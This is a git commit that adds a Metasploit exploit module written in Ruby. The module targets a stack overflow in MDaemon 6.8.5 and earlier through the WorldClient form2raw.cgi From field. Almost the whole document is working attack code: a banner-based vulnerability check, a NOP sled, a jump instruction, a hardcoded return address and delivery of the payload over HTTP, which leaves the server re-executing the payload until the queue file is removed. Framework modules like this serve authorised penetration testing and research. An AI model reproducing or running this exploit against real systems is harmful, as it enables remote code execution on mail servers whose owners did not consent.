Added MDaemon WorldClient Form2Raw.cgi exploit module.

git-svn-id: file:///home/svn/framework3/trunk@6736 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Patrick Webster 2009-07-03 01:26:21 +00:00
parent 69725e75a2
commit a4e0c88a1b
1 changed files with 110 additions and 0 deletions

View File

@ -0,0 +1,110 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in Alt-N MDaemon SMTP server for
versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),
a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,
by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),
the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based
overflow occurs when an excessively long From field is specified.
The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.
Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.
Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very
reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will
continue to crash/execute the payload until the CGI output is manually deleted
from the queue in C:\MDaemon\RawFiles\*.raw.
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '9317' ],
[ 'CVE', '2003-1200' ],
[ 'OSVDB', '3255' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 900,
'BadChars' => "\x00\x0a\x0d%\x20@<>&?|,;=`()${}\#!~\"\xff\/\\",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
# Patrickw - Tested OK-ish 20090702 w2k
[ 'Universal MDaemon.exe', { 'Ret' => 0x022fcd46 } ], # direct memory jump :(
[ 'Debugging test', { 'Ret' => 0x44434241 } ],
],
'DisclosureDate' => 'Dec 29 2003',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(3000),
],self.class)
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
disconnect
if (banner =~ /WDaemon\/6\.8\.[0-5]/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = "GET /form2raw.cgi?From=" # Trigger vuln
sploit << "\x90" * 242 # We set EIP to the middle of this.
sploit << Rex::Arch::X86.jmp_short(61) # Then jump over some junk memory.. 60 is precise but is a badchar.
sploit << [target['Ret']].pack('V') + "c" # Return address, plus 1 byte overwrite for ESP... 'c'
sploit << "&To=#{Rex::Text.rand_text_alpha(12)}@#{Rex::Text.rand_text_alpha(12)}.#{Rex::Text.rand_text_alpha(3)}"
sploit << "&Body=" + "\x90" * 1 # 1 Byte for short jump.
sploit << payload.encoded + " HTTP/1.0"
sock.put(sploit + "\r\n\r\n")
res = sock.get(3,3)
if (res =~ /Message spooled but will be deleted if not FROM a valid account/)
print_status("Payload accepted by WorldClient Form2Raw CGI!")
print_status("Wait for the Raw Queue to be processed (1 to 60 minutes).")
else
print_status("Message not accepted. Vulnerable target?")
end
handler
disconnect
end
end